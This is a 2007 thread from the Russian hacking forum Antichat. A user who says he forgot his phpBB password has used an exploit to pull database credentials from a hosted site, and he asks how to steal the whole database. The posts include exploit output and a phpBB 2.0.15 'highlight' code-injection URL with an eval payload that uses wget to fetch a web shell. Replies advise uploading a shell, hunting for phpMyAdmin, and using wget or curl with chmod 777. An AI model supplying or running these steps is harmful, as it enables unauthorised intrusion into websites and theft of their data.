Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.11.2007, 17:51
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
h15 mySQL
Всем привет! Забыл пароль от форума phpbb 
заюзал сплойтик, узнал пасс и логин к дб., но адресок к дб мне совсем не понравился, выглядело это вот так
Connecting OK
Sending exploit OK
Database Host: database
Database Name: xxxxxx5
Username: xxxxxx5
Password: xxxxxx5
гугл подсказал мне, что это нормально, т к доступ к mySQL на h15.ru возможен только с локал машины.
Это так???
Далее появилась идея залить с помощью PuttyFTP, скриптик, который копернул бы всю БД.
Но опять столкнулся с проблемой такого содержания, врубил Putty, указал адресок, ввел логин, а вот пасс вводиться не хочет, ни руками, ни копипастом.
Пробывал логиниться через браузер, но натыкаюсь на 403 - Forbidden
Попробывал зарегить, свой сайтик, чтобы протестить Putty на нем, но рега временно в дауне (((
Что здесь может быть не так???
Или просто у них вместе с регой и авторизация в дауне?
И вообще верна ли логика моих действий? или есть способы получше?
Последний раз редактировалось am@tory; 21.11.2007 в 17:56..
|
|
|
21.11.2007, 17:55
|
|
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394
Репутация:
547
|
|
...а вот пасс вводиться не хочет, ни руками, ни копипастом.
o.0
Хы тоже высаживался в первые разы...Когда вводишь, он не отображается на экране, ни звездочками, никак.
Тоесть: ввел и жми.
|
|
|
|
21.11.2007, 17:59
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Хуже нет, когда пароль не знаешь, да еще и забыл ))
1). Залей шелл. Если смог вытащить пароли к бд, то это не проблема. В нормальном есть функция бекапа базы (хоть с локалхоста)
2). найди на сайте что-то вроде phpmyadmin
P.S. ты указываешь пароли от БД к акку от FTP?
Последний раз редактировалось Basurman; 21.11.2007 в 18:01..
|
|
|
|
21.11.2007, 18:09
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Всем огромное спасибо, у меня еще 1 вопрос.
Не знаю о хосте на холме нечего, в мануале ихнем написано
Для администрирования Ваших виртуальных серверов мы предоставляем Ваш shell доступ. Он также необходим для работы с БД MySQL и отладки CGI скриптов. Доступ к shell осуществляется с помощью SSH-клиента. Для его использования Вам необходимо скачать и установить SSH-клиент, например Putty. В архиве кроме самого ssh клиента находится утилита, аналогичная утилите scp, которая позволяет осуществлять копирование файлов. Настройка клиента сводится к указанию имени хоста, указания протокола, вводу имени пользователя и пароля. Для нашего сервера это:
Пароль: Ваш пароль в системе (тот же, что и для FTP доступа)
Возможно ли изменить пассы там, т е на фтпшник и mySQL разные поставить?
Просто что то не могу я залогиться на фтп(
ты указываешь пароли от БД к акку от FTP?
насколько я понял, сплойт дает 1 пасс от бд и это наверно от фтп тоже, судя из выше описанного. нет?
Последний раз редактировалось am@tory; 21.11.2007 в 18:18..
|
|
|
|
21.11.2007, 18:19
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
там и так разные уже...
нет. сплоит тебе вернул пароль от БД. ФТП аккаунт (как и SSH) совсем другой  |
|
|
|
21.11.2007, 18:20
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Basurman
там и так разные уже...
понятно...
В силу слабых знаний, на этом мои гениальные идеи заканчиваются)) Можно еще чтонить сделать, зная только пасс от бд на локалмашине? форум phpbb v2.0.15
Последний раз редактировалось am@tory; 21.11.2007 в 18:22..
|
|
|
|
21.11.2007, 18:35
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
в третьем сверху сообщении я тебе уже ответил |
|
|
|
21.11.2007, 18:36
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Basurman
в третьем сверху сообщении я тебе уже ответил Я не особо знаком с такими методами, я пока литературку полопачу, а ты если сможеш отпишись мне сеня в асю плз.
|
|
|
|
22.11.2007, 04:58
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Помогите плз.
phpbb 2.0.15
Вообщем вот что мне удалось узнать
http://site.h15.ru/forum//viewtopic.php?t=&highlight='.phpinfo().'
Put_phpinfo: [/home/b/site.h15.ru/WWW/forum//viewtopic.php]
Смогу ли я залить шелл таким запросом???
http://site.h15/forum/viewtopic.php?&cmd=wget http://shells//fuck.php;&highlight='.eval($HTTP_GET_VARS[cmd]).'
Или нет???
Ответьте плз..
И еще огромная просьба, кто может дать шел, чтобы стибрить всю sql, зная логин и пасс???
Если я не прав, то плз подробно опишите куда, как, что и как потом достать)))
Вообще пробывал заюзать сплойт
http://milw0rm.com/exploits/1076
Не смог, т не знаю какой командой залить шел, оп пристал ко мне с табличкой вида
site.h15.ru/forum/$ а что написать я незнаю....
Последний раз редактировалось am@tory; 22.11.2007 в 05:06..
|
|
|
|
22.11.2007, 05:53
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569
Репутация:
11
|
|
юзай nst shell Вообще на хэ15 дыры же латают я думаю сплойт который есть в паблике врятли поможет
Шелл заливается командой wget http://адресс шела
Главное чтобы в адресе cd была папка с правами на запись
Ну если у тебя есть права на выполнение то можно chmod 777 команду выполнить
ещё есть команды curl -0 ./shell.php http://адресс (вроде так) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
